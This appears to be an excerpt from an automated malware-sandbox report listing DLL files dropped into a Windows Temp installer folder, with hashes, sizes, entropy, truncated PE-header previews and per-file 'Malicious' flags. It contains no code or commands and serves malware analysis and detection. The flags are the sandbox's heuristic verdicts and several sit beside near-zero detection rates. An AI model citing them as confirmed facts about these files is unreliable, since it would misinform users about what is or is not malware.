                                                                                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...&M.L.................x...$......`2............@...........................2.......2..............................................P ..x..............................................................................4............................text....w.......x..................`....rdata...#.......$...|..............@..@.data...8........0..................@....rsrc....z...P ..z..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):259014
                                                                                Entropy (8bit):6.075222655669795
                                                                                Encrypted:false
                                                                                SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                                                MD5:B4FDE05A19346072C713BE2926AF8961
                                                                                SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                                                SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                                                SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):291245
                                                                                Entropy (8bit):6.234245376773595
                                                                                Encrypted:false
                                                                                SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                                MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                                SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                                SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                                SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):174543
                                                                                Entropy (8bit):6.3532700320638025
                                                                                Encrypted:false
                                                                                SSDEEP:3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
                                                                                MD5:65D8CB2733295758E5328E5A3E1AFF15
                                                                                SHA1:F2378928BB9CCFBA566EC574E501F6A82A833143
                                                                                SHA-256:E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
                                                                                SHA-512:BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):706136
                                                                                Entropy (8bit):6.517672165992715
                                                                                Encrypted:false
                                                                                SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                                MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                                SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                                SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                                SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):64724
                                                                                Entropy (8bit):5.910307743399971
                                                                                Encrypted:false
                                                                                SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                                                MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                                                SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                                                SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                                                SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):121524
                                                                                Entropy (8bit):6.347995296737745
                                                                                Encrypted:false
                                                                                SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
                                                                                MD5:6CE25FB0302F133CC244889C360A6541
                                                                                SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
                                                                                SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
                                                                                SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):814068
                                                                                Entropy (8bit):6.5113626552096
                                                                                Encrypted:false
                                                                                SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
                                                                                MD5:5B1EB4B36F189362DEF93BF3E37354CC
                                                                                SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
                                                                                SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
                                                                                SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):181527
                                                                                Entropy (8bit):6.362061002967905
                                                                                Encrypted:false
                                                                                SSDEEP:3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
                                                                                MD5:0D0D311D1837705B1EAFBC5A85A695BD
                                                                                SHA1:AA7FA3EB181CC5E5B0AA240892156A1646B45184
                                                                                SHA-256:AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
                                                                                SHA-512:14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..............#..............................Te......................... ................ .........................b........#......................................................................................H............................text...$...........................`.P`.data...4...........................@.0..rdata...J.......L..................@.`@/4.......I... ...J..................@.0@.bss.........p........................`..edata..b............@..............@.0@.idata...#.......$...V..............@.0..CRT....,............z..............@.0..tls.... ............|..............@.0..rsrc................~..............@.0..reloc..............................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):268404
                                                                                Entropy (8bit):6.265024248848175
                                                                                Encrypted:false
                                                                                SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
                                                                                MD5:C4C23388109D8A9CC2B87D984A1F09B8
                                                                                SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
                                                                                SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
                                                                                SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............|..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):463112
                                                                                Entropy (8bit):6.363613724826455
                                                                                Encrypted:false
                                                                                SSDEEP:12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
                                                                                MD5:D9D9C79E35945FCA3F9D9A49378226E7
                                                                                SHA1:4544A47D5B9765E5717273AAFF62724DF643F8F6
                                                                                SHA-256:18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
                                                                                SHA-512:B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):26562
                                                                                Entropy (8bit):5.606958768500933
                                                                                Encrypted:false
                                                                                SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                                MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                                SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                                SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                                SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):337171
                                                                                Entropy (8bit):6.46334441651647
                                                                                Encrypted:false
                                                                                SSDEEP:3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
                                                                                MD5:51D62C9C7D56F2EF2F0F628B8FC249AD
                                                                                SHA1:33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
                                                                                SHA-256:FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
                                                                                SHA-512:03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):174543
                                                                                Entropy (8bit):6.3532700320638025
                                                                                Encrypted:false
                                                                                SSDEEP:3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
                                                                                MD5:65D8CB2733295758E5328E5A3E1AFF15
                                                                                SHA1:F2378928BB9CCFBA566EC574E501F6A82A833143
                                                                                SHA-256:E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
                                                                                SHA-512:BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):235032
                                                                                Entropy (8bit):6.398850087061798
                                                                                Encrypted:false
                                                                                SSDEEP:6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
                                                                                MD5:E1D0ACD1243F9E59491DC115F4E379A4
                                                                                SHA1:5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
                                                                                SHA-256:FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
                                                                                SHA-512:392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):441975
                                                                                Entropy (8bit):6.372283713065844
                                                                                Encrypted:false
                                                                                SSDEEP:6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
                                                                                MD5:6CD78C8ADD1CFC7CBB85E2B971FCC764
                                                                                SHA1:5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
                                                                                SHA-256:C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
                                                                                SHA-512:EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................|....................................................................................text...4|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..|...........................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):140752
                                                                                Entropy (8bit):6.52778891175594
                                                                                Encrypted:false
                                                                                SSDEEP:3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
                                                                                MD5:A8F646EB087F06F5AEBC2539EB14C14D
                                                                                SHA1:4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
                                                                                SHA-256:A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
                                                                                SHA-512:93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):509934
                                                                                Entropy (8bit):6.031080686301204
                                                                                Encrypted:false
                                                                                SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                                                MD5:02E6C6AB886700E6F184EEE43157C066
                                                                                SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                                                SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                                                SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):397808
                                                                                Entropy (8bit):6.396146399966879
                                                                                Encrypted:false
                                                                                SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                                                MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                                                SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                                                SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                                                SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):171848
                                                                                Entropy (8bit):6.579154579239999
                                                                                Encrypted:false
                                                                                SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                                                MD5:236A679AB1B16E66625AFBA86A4669EB
                                                                                SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                                                SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                                                SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):259014
                                                                                Entropy (8bit):6.075222655669795
                                                                                Encrypted:false
                                                                                SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                                                MD5:B4FDE05A19346072C713BE2926AF8961
                                                                                SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                                                SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                                                SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
